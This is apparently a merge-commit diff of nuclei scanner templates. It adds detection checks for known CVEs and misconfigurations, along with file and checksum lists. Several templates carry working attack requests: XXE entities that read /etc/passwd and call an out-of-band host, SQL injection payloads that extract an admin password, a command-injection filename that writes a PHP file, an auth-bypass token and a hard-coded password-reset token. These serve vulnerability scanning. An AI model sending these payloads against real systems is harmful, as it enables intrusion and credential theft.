Merge branch 'main' into main

main
Noel Varghese 2024-07-25 18:39:00 +05:30 committed by GitHub
commit 9bc0c27572
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
14 changed files with 659 additions and 208 deletions

View File

@ -5,6 +5,7 @@ on:
- '.new-additions'
- 'headless/2024/CVE-2024-38526.yaml'
- 'http/cnvd/2023/CNVD-2023-72138.yaml'
- 'http/cves/2022/CVE-2022-34267.yaml'
- 'http/cves/2022/CVE-2022-38322.yaml'
- 'http/cves/2022/CVE-2022-45269.yaml'
- 'http/cves/2023/CVE-2023-2309.yaml'
@ -21,12 +22,16 @@ on:
- 'http/cves/2024/CVE-2024-34351.yaml'
- 'http/cves/2024/CVE-2024-3742.yaml'
- 'http/cves/2024/CVE-2024-37843.yaml'
- 'http/cves/2024/CVE-2024-38289.yaml'
- 'http/cves/2024/CVE-2024-39250.yaml'
- 'http/cves/2024/CVE-2024-39914.yaml'
- 'http/cves/2024/CVE-2024-40348.yaml'
- 'http/cves/2024/CVE-2024-4257.yaml'
- 'http/cves/2024/CVE-2024-4295.yaml'
- 'http/cves/2024/CVE-2024-4879.yaml'
- 'http/cves/2024/CVE-2024-4885.yaml'
- 'http/cves/2024/CVE-2024-5217.yaml'
- 'http/cves/2024/CVE-2024-5315.yaml'
- 'http/cves/2024/CVE-2024-6289.yaml'
- 'http/cves/2024/CVE-2024-6587.yaml'
- 'http/cves/2024/CVE-2024-6646.yaml'
@ -49,15 +54,19 @@ on:
- 'http/misconfiguration/mongod-exposure.yaml'
- 'http/misconfiguration/servicenow-title-injection.yaml'
- 'http/misconfiguration/sftpgo-admin-setup.yaml'
- 'http/misconfiguration/ssrpm-arbitrary-password-reset.yaml'
- 'http/technologies/apache/apache-gravitino-detect.yaml'
- 'http/technologies/apache/apache-ozone-detect.yaml'
- 'http/technologies/wordpress/plugins/fluent-smtp.yaml'
- 'http/technologies/wordpress/plugins/wp-crontrol.yaml'
- 'http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml'
- 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml'
- 'http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml'
- 'http/vulnerabilities/other/jan-file-upload.yaml'
- 'http/vulnerabilities/other/lvs-download-lfi.yaml'
- 'http/vulnerabilities/other/ncast-lfi.yaml'
- 'http/vulnerabilities/other/wifisky7-rce.yaml'
- 'network/c2/7777botnet.yaml'
- 'network/cves/2024/CVE-2024-6746.yaml'
- 'vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml'
- 'workflows/nacos-workflow.yaml'

View File

@ -1,5 +1,6 @@
headless/2024/CVE-2024-38526.yaml
http/cnvd/2023/CNVD-2023-72138.yaml
http/cves/2022/CVE-2022-34267.yaml
http/cves/2022/CVE-2022-38322.yaml
http/cves/2022/CVE-2022-45269.yaml
http/cves/2023/CVE-2023-2309.yaml
@ -16,12 +17,16 @@ http/cves/2024/CVE-2024-34257.yaml
http/cves/2024/CVE-2024-34351.yaml
http/cves/2024/CVE-2024-3742.yaml
http/cves/2024/CVE-2024-37843.yaml
http/cves/2024/CVE-2024-38289.yaml
http/cves/2024/CVE-2024-39250.yaml
http/cves/2024/CVE-2024-39914.yaml
http/cves/2024/CVE-2024-40348.yaml
http/cves/2024/CVE-2024-4257.yaml
http/cves/2024/CVE-2024-4295.yaml
http/cves/2024/CVE-2024-4879.yaml
http/cves/2024/CVE-2024-4885.yaml
http/cves/2024/CVE-2024-5217.yaml
http/cves/2024/CVE-2024-5315.yaml
http/cves/2024/CVE-2024-6289.yaml
http/cves/2024/CVE-2024-6587.yaml
http/cves/2024/CVE-2024-6646.yaml
@ -44,15 +49,19 @@ http/misconfiguration/installer/freshrss-installer.yaml
http/misconfiguration/mongod-exposure.yaml
http/misconfiguration/servicenow-title-injection.yaml
http/misconfiguration/sftpgo-admin-setup.yaml
http/misconfiguration/ssrpm-arbitrary-password-reset.yaml
http/technologies/apache/apache-gravitino-detect.yaml
http/technologies/apache/apache-ozone-detect.yaml
http/technologies/wordpress/plugins/fluent-smtp.yaml
http/technologies/wordpress/plugins/wp-crontrol.yaml
http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml
http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml
http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml
http/vulnerabilities/other/jan-file-upload.yaml
http/vulnerabilities/other/lvs-download-lfi.yaml
http/vulnerabilities/other/ncast-lfi.yaml
http/vulnerabilities/other/wifisky7-rce.yaml
network/c2/7777botnet.yaml
network/cves/2024/CVE-2024-6746.yaml
vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml
workflows/nacos-workflow.yaml

View File

@ -1,8 +1,8 @@
id: generic-xxe
info:
name: Generic XML external entity (XXE)
author: pwnhxl
name: Generic XML External Entity - (XXE)
author: pwnhxl,AmirHossein Raeisi
severity: medium
reference:
- https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py
@ -23,6 +23,7 @@ http:
xxe:
- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:///c:/windows/win.ini"> ]><x>&{{rletter}};</x>'
- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:////etc/passwd"> ]><x>&{{rletter}};</x>'
- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "http://{{interactsh-url}}"> ]><x>&{{rletter}};</x>'
fuzzing:
- part: query
@ -38,7 +39,6 @@ http:
- "{{xxe}}"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
name: linux
@ -51,4 +51,9 @@ http:
part: body
words:
- 'for 16-bit app support'
# digest: 490a0046304402200765457e7ce86f2875c9b0446d1e4d4a3f035e95c8cb70d2c685bed047e1883c022000fb0dbfce1acce174129de4808904972d457aae4cc27dd68672d8e5a14d49b1:922c64590222798bb761d5b6d8e72950
- type: word
part: interactsh_protocol
words:
- "http"
# digest: 4a0a00473045022100fc0d6d7e83a8c8d79bdd40f6ee0f749ce6fa2cb1c21a9512b043af0fbf2f37980220225bcf70bc1a1a1a46791f3707b12a5c302d1a9da94851d2c33e450749551c76:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,50 @@
id: CVE-2022-34267
info:
name: RWS WorldServer - Authentication Bypass
author: pdresearch,iamnoooob,rootxharsh,parthmalhotra
severity: critical
description: |
An issue was discovered in RWS WorldServer before 11.7.3. Adding a token parameter with the value of 02 bypasses all authentication requirements. Arbitrary Java code can be uploaded and executed via a .jar archive to the ws-api/v2/customizations/api endpoint.
reference:
- https://www.triskelelabs.com/vulnerabilities-in-rws-worldserver
- https://www.rws.com/localization/products/trados-enterprise/worldserver/
- https://github.com/tanjiti/sec_profile
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-34267
cwe-id: CWE-287
epss-score: 0.00106
epss-percentile: 0.43655
cpe: cpe:2.3:a:rws:worldserver:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: rws
product: worldserver
shodan-query: title:"WorldServer"
tags: cve,cve2022,worldserver,auth-bypass
http:
- raw:
- |
GET /ws-api/v2/users/me/details?token=02 HTTP/2
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"fullName":"System"'
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 490a0046304402200e8769d2734c037de9115be5b7a4e32352651fdd297bd38f049b7f80932010710220460901c13962e91d58fa871dcfd5567ec9038743c52998b16807a8354ffe377a:922c64590222798bb761d5b6d8e72950

View File

@ -55,3 +55,4 @@ http:
part: content_type
words:
- "application/json"
# digest: 490a00463044022002dca2f2b0925cbe4564e9abdf3f70b914472fcecde703539b7834ad0d4c8aea02207c9493c976a30ef2f6ad0e7be9a8c8edd366b67477a88c89ad7c574e50005def:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,44 @@
id: CVE-2024-38289
info:
name: TurboMeeting - Boolean-based SQL Injection
author: rootxharsh,iamnoooob,pdresearch
severity: critical
description: |
A Boolean-based SQL injection vulnerability in the "RHUB TurboMeeting" web application. This vulnerability could allow an attacker to execute arbitrary SQL commands on the database server, potentially allowing them to access sensitive data or compromise the server.
reference:
- https://github.com/google/security-research/security/advisories/GHSA-vx5j-8pgx-v42v
metadata:
verified: true
max-request: 2
shodan-query: html:"TurboMeeting"
tags: cve,cve2024,sqli,turbomeeting
http:
- raw:
- |
POST /as/wapi/vmp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
meeting_id=1'/**/OR/**/1=1/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**
- |
POST /as/wapi/vmp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
meeting_id=1'/**/OR/**/1=2/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- '<__Status__>SUCCEED</__Status__>'
- type: word
part: body_2
words:
- '<__Status__>FAILED</__Status__>'
# digest: 490a0046304402200529dc5c8778e012e9cbb7ffa30d733dc1c0587b432825bef1f5231c3e8986c30220102ab38598176c7395f39eb02a1ab74dc442f237b847feb8dc497b297446afa6:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,52 @@
id: CVE-2024-39250
info:
name: EfroTech Timetrax v8.3 - Sql Injection
author: securityforeveryone,efran
severity: high
description: |
EfroTech Timetrax v8.3 was discovered to contain an unauthenticated SQL injection vulnerability via the q parameter in the search web interface.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-39250
- https://www.tenable.com/cve/CVE-2024-39250
- https://github.com/efrann/CVE-2024-39250
- https://vuldb.com/?id.272268
classification:
epss-score: 0.00043
epss-percentile: 0.09359
metadata:
vendor: efroTech
product: timetrax
fofa-query: icon_hash="-661694518"
tags: cve,cve2024,sqli,timetrax
flow: http(1) && http(2)
http:
- raw:
- |
GET /Login.aspx HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"TimeTrax - Cloud HR Software")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET /search.aspx?q=' HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"Incorrect syntax near","Unclosed quotation mark after the character string")'
- 'contains(content_type, "text/html")'
- 'status_code == 500'
condition: and
# digest: 4a0a00473045022066aa1139efa896b1ff2d92fa0b8320c4449e8b7b3f74ea7a954e30825c32a568022100cf323de98b87fd1b4aa2a2c8579328f248d5f45980d3ecd7348d1ff9beac66d5:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,64 @@
id: CVE-2024-39914
info:
name: FOG Project < 1.5.10.34 - Remote Command Execution
author: securityforeveryone
severity: critical
description: |
FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php.
remediation: Fixed in 1.5.10.34
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-39914
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39914
- https://github.com/FOGProject/fogproject/security/advisories/GHSA-7h44-6vq6-cq8j
- https://blog.csdn.net/qq_39894062/article/details/140550009
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-39914
cwe-id: CWE-77
epss-score: 0.00043
epss-percentile: 0.09367
metadata:
vendor: fogproject
product: fogproject
fofa-query: icon_hash="-1952619005"
tags: cve,cve2024,rce,fog
variables:
filename: "{{to_lower(rand_text_alpha(12))}}"
num: "{{rand_int(1000, 9999)}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /management/export.php?filename=$(echo+'<?php+echo+md5({{num}});+?>'+>+{{filename}}.php)&type=pdf HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
fogguiuser=fog&nojson=2
matchers:
- type: dsl
dsl:
- 'contains_all(body,"No HTML files!","HTMLDOC")'
- 'contains(content_type, "application/pdf")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET /management/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"{{md5(num)}}")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022075ee2c37d4da90160d134db9e8e9df85d9b449f9095211cc0cb9371aac4dcf53022100de284762c25011f52d379931b93129ff859eb86b044cc0954ea631adfb0b4844:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,59 @@
id: CVE-2024-5315
info:
name: Dolibarr ERP CMS `list.php` - SQL Injection
author: rootxharsh,iamnoooob,pdresearch
severity: critical
description: |
Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection.
impact: |
These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters viewstatut in /dolibarr/commande/list.php
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-5315
- https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dolibarrs-erp-cms
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-5315
cwe-id: CWE-89
epss-score: 0.00043
epss-percentile: 0.09367
metadata:
verified: true
max-request: 1
shodan-query: http.title:"Dolibarr"
tags: cve,cve2024,dolibarr,erp,sqli,authenticated
variables:
username: "{{username}}"
password: "{{password}}"
http:
- raw:
- |
POST /htdocs/index.php?mainmenu=home HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
loginfunction=loginfunction&username={{username}}&password={{password}}
- |
GET /htdocs/commande/list.php?viewstatut=x%27 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- You have an error in your SQL syntax
- type: word
part: header_1
words:
- 'Set-Cookie: DOLSESSID_'
- type: word
part: body_1
words:
- SuperAdmin

View File

@ -0,0 +1,52 @@
id: ssrpm-arbitrary-password-reset
info:
name: SSRPM - Arbitary Password Reset on Default Client Interface Installation
author: vince-isec
severity: high
description: |
The default installation of the Client Web Interface, which is provided alongside the COM SSRPM service, defines a hard-coded secret token for the Import endpoint. This endpoint allows registering new accounts or overwriting existing onboarding data for an arbitrary account, which ultimately allows changing the password of an arbitrary account.
remediation: Set a new and random value to the OnboardingToken setting. Install the new version of SSRPM and its web interface.
reference:
- https://www.synacktiv.com/advisories/ssrpm-arbitrary-password-reset-on-default-client-web-interface-installation
metadata:
shodan-query: http.favicon.hash:-916902413
max-request: 1
verified: true
tags: ssrpm,intrusive
variables:
string: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /Onboarding/Import HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
OnboardingToken=7e30bebc-d17c-4833-98b6-d4c09e076b24&Action={{string}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"ErrorCode":-55'
- '"Success":false'
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
extractors:
- type: kval
kval:
- string
# digest: 4a0a00473045022050149c259ebd2c53027582dbb9a79dd703cfcfb1ca9357feae23108fe913029e022100ed0ef223ee9d627a4e6d68b56000280be279df21d258df4e07cf298191866c99:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,30 @@
id: apache-gravitino-detect
info:
name: Apache Gravitino - Detect
author: icarot
severity: info
description: |
Detects a Apache Gravitino web application, world's most powerful open data catalog for building a high-performance, geo-distributed and federated metadata lake.
metadata:
max-request: 1
vendor: apache
product: gravitino
shodan-query: title:"Gravitino"
tags: tech,gravitino,apache,detect
http:
- method: GET
path:
- "{{BaseURL}}/ui/metalakes"
matchers-condition: and
matchers:
- type: word
words:
- '<title>Gravitino'
- type: status
status:
- 200
# digest: 4b0a0048304602210095884937207db886a1eb80dcfb9e79954e713504b0ee7a34a078aa86617c3c05022100c5a0fd536b800b4b286cb0ca17ebbdbdcdbb71e32580246ce9b2cb46b1c73d04:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,36 @@
id: hikvision-isecure-info-leak
info:
name: HIKVISION iSecure Center - Information Leak
author: adeljck
severity: high
description: |
HIKVISION iSecure Center comprehensive security management platform is an "integrated" and "intelligent" platform. By accessing equipment such as video surveillance, all-in-one card, parking lot, alarm detection and other systems, Hikvision comprehensive security management platform information exists Information leakage (internal network centralized account password) vulnerability can be decrypted through decryption software, username and password.
reference:
- https://github.com/adeljck/Hikvision_Info_Leak
- https://github.com/wy876/POC/blob/main/%E6%B5%B7%E5%BA%B7%E5%A8%81%E8%A7%86%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md
metadata:
verified: true
max-request: 1
fofa-query: app="HIKVISION-综合安防管理平台"
tags: infoleak,iot,hikvision
http:
- method: GET
path:
- "{{BaseURL}}/portal/conf/config.properties"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '@bic'
- 'username'
- 'password'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022005b0e92f0ddbd6578fdc149b7eddf7d5c091a38bc7c69b0656e01ab04a189bb0022100e879f64938e3b6988168267fc153650ad248adc382337e296a7ed7afb074b6f1:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,31 @@
id: 7777botnet-detect
info:
name: 7777-Botnet - Detect
author: johnk3r
severity: info
reference:
- https://gi7w0rm.medium.com/the-curious-case-of-the-7777-botnet-86e3464c3ffd
metadata:
verified: true
max-request: 1
shodan-query: 'hash:1357418825'
tags: network,c2,ir,osint,cti,darktrack,botnet,tcp
tcp:
- inputs:
- data: "fffc01fffb1ffffa1f00500018fff0fffd01fffd03"
read: 2048
host:
- "{{Hostname}}"
port: 7777
matchers:
- type: word
part: data
words:
- "xlog"
- "in"
condition: and
# digest: 4b0a00483046022100e357f37402bb259b1f286493d649e53d2a2e4e63432ecdfda050ca7fefdbc79e022100ed45eca12e16c502eaef471e531aa28c7956d7ce19ec741ab5decdbe410d467f:922c64590222798bb761d5b6d8e72950

View File

@ -249,7 +249,7 @@ dast/vulnerabilities/ssrf/response-ssrf.yaml:104def6ff82e4dcfc88917f98403bea903e
dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851
dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253
dast/vulnerabilities/xss/reflected-xss.yaml:46717ee593fe9809385572b82e9b1a7265c3cf6f
dast/vulnerabilities/xxe/generic-xxe.yaml:c0dfcc8fa1d2879f2985806eff40727036cdf51a
dast/vulnerabilities/xxe/generic-xxe.yaml:d803e0d74fa83905be163e717878cc00b647a58b
dns/azure-takeover-detection.yaml:5295c90a6fa66f513eca7f6f30eee8745a41aa0a
dns/bimi-detect.yaml:bde903bfbcd370747978534ce2391131b12b08f0
dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24
@ -2840,6 +2840,7 @@ http/cves/2022/CVE-2022-34049.yaml:50c3e971603a6b6b59cf47ea353d59db6ce9a94e
http/cves/2022/CVE-2022-34093.yaml:507d9374130389cd1aec5b58c6adb274020e93c7
http/cves/2022/CVE-2022-34094.yaml:532360cc425c43471f60b0c3a4668b2b416ba392
http/cves/2022/CVE-2022-34121.yaml:dbea363aeb740fe3e7119e4e1fdb4a7c39c07d28
http/cves/2022/CVE-2022-34267.yaml:41e87277f9e9fc26caf73ae8b224dc02e04fe66e
http/cves/2022/CVE-2022-34328.yaml:bcf3e8505f0ea0d20573124187336e6991c961aa
http/cves/2022/CVE-2022-34534.yaml:2bbe4596a2683f6464b9c40222fdd20c944edc8e
http/cves/2022/CVE-2022-34576.yaml:c9eb8acdc06081e67f0d7f015281f30f203eea51
@ -3496,10 +3497,13 @@ http/cves/2024/CVE-2024-37032.yaml:098e78c2cfc97aee7b9e22ff34101e609f023cc2
http/cves/2024/CVE-2024-37152.yaml:45b7e5ca110853fe4cca80588d33d140f611d1e2
http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd
http/cves/2024/CVE-2024-3742.yaml:c14a1c00e621d1d77ddf978af6680fc4b05c3aa1
http/cves/2024/CVE-2024-37843.yaml:dc881e4de411f052173b23a79404997dd5f16e7f
http/cves/2024/CVE-2024-37843.yaml:bc236163373e7c3621139f152cb99b39b9a231c7
http/cves/2024/CVE-2024-37881.yaml:060af3bf51e4ab05684d4923658d02b3c49583bb
http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c
http/cves/2024/CVE-2024-38289.yaml:c6c9991b71e360f1071113d9a5a70fcbd13ad39f
http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21
http/cves/2024/CVE-2024-39250.yaml:ff485ce5537d94dfd260abb578b3c4d85ecb3797
http/cves/2024/CVE-2024-39914.yaml:2c8d9d4637d5806823bcba86390d8646d1db66bf
http/cves/2024/CVE-2024-40348.yaml:e1b3c7bd1bfe293d155f1999f412eee670c8334b
http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310
http/cves/2024/CVE-2024-4257.yaml:76768a186c284a20129bc8f67a2c620f8c1fc7ac
@ -3516,12 +3520,13 @@ http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a
http/cves/2024/CVE-2024-5084.yaml:8ede90fad7058c4a2a7499562f98cacae32ede68
http/cves/2024/CVE-2024-5217.yaml:cf2d874cba1069c15371fe16a5ede176ba0bfae7
http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c
http/cves/2024/CVE-2024-5315.yaml:6faf9f7e543e47415ad0c0bccceb162b6d590489
http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a
http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6
http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991
http/cves/2024/CVE-2024-6188.yaml:dc4f78116668d20ee580f223cdf67a19cd0c6f26
http/cves/2024/CVE-2024-6289.yaml:83d044a4385a60a024a6dee9f02644f4db94a4b7
http/cves/2024/CVE-2024-6587.yaml:41f032f7fdea0ab85006037157cde723104631f4
http/cves/2024/CVE-2024-6587.yaml:3b9b74b62b5fee24b9ae9e2138affc55ffabe1d3
http/cves/2024/CVE-2024-6646.yaml:2e73ea26a9329272c114fbee69cc648183fda206
http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3
http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce
@ -6000,6 +6005,7 @@ http/misconfiguration/springboot/springboot-threaddump.yaml:c47af0dade8ae96dd8b3
http/misconfiguration/springboot/springboot-trace.yaml:a9e0cdf03cba6bd28b52ad7e2ab0174745c638da
http/misconfiguration/sql-server-report-viewer.yaml:cce6309b5b0a456fa34db30015e028db0b81f0be
http/misconfiguration/ssrf-via-oauth-misconfig.yaml:1e1ec614f023cbb22a5c7bf5eed4e3c3ffe272f6
http/misconfiguration/ssrpm-arbitrary-password-reset.yaml:4413a1c2a718d1ddf9b8aaf14c81cbd48adc493a
http/misconfiguration/struts-ognl-console.yaml:f32871fc3e05d8a7901b9a4d873b0ca9f77ab646
http/misconfiguration/symfony-debug.yaml:3bee3431aa9041e36dab6a3f95fd67af5bf23454
http/misconfiguration/symfony-fosjrouting-bundle.yaml:e246351ce97fbf8db877bf81e95ed713cae4bed4
@ -6929,6 +6935,7 @@ http/technologies/apache/apache-cloudstack-detect.yaml:c08888a73f19a2dd082a7a928
http/technologies/apache/apache-cocoon-detect.yaml:773bd2977ddbb3403acfcd0f8e4cf10c81b84495
http/technologies/apache/apache-detect.yaml:1ec0c234a8a4487c59726af437b6eaa1fa249507
http/technologies/apache/apache-dubbo-detect.yaml:454eb1d29924d2b5f4a9f6765d3062646950f91a
http/technologies/apache/apache-gravitino-detect.yaml:d161c9066c256afd0680c7efdb6c3e5bf7233819
http/technologies/apache/apache-guacamole.yaml:8c7975c569769ee074f51307e0d963b816e631aa
http/technologies/apache/apache-karaf-panel.yaml:50fa0b20105a0786c5ce5ddce7aa5c49237bfafa
http/technologies/apache/apache-ozone-detect.yaml:a06d145bb51dd1d87c14bc151843fdf8c5ef7285
@ -7320,230 +7327,230 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf
http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc
http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d
http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8
http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703
http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3
http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142
http/technologies/wordpress/plugins/ad-inserter.yaml:4489db8b4effdc5acfb2512eebd7fe8d71b9fbcf
http/technologies/wordpress/plugins/add-to-any.yaml:78cab82afd1d6d0f4c08f4907868458c9a2ce804
http/technologies/wordpress/plugins/admin-menu-editor.yaml:212d13144797e3fbe1a295f6c75ecbdcf9fb3982
http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611
http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d
http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861
http/technologies/wordpress/plugins/advanced-custom-fields.yaml:494941836cdd32c55d48fb5144b4715e18bc1286
http/technologies/wordpress/plugins/akismet.yaml:63ab994340b90872e57516e11a280a5a86696153
http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b
http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1
http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375
http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897
http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295
http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c
http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e
http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:ae6088c437ae06debbae7fe3dc1041c52b2c680a
http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:52d912aa5c5bd643aec4a17977d21dbb8fec7196
http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:5456c1ae86c0402f7bd61cdabe18625a17f6df19
http/technologies/wordpress/plugins/amp.yaml:f5a0e59b28b79190de7d91ed932526361e9ac305
http/technologies/wordpress/plugins/antispam-bee.yaml:d556d5513fd9f7ec878c8b9c91c3a398aef646cc
http/technologies/wordpress/plugins/astra-sites.yaml:d67139fe1ed9dc29ed1598a62e5b72c7996e9ff9
http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09
http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50
http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30
http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719
http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7
http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533
http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2
http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62
http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba
http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff
http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d
http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52
http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6
http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131
http/technologies/wordpress/plugins/autoptimize.yaml:c20236fe42d79e50a91660f1ad4b27e3e8870cdc
http/technologies/wordpress/plugins/backwpup.yaml:95e3728fe143867d25dbd9eb90368c7008955a97
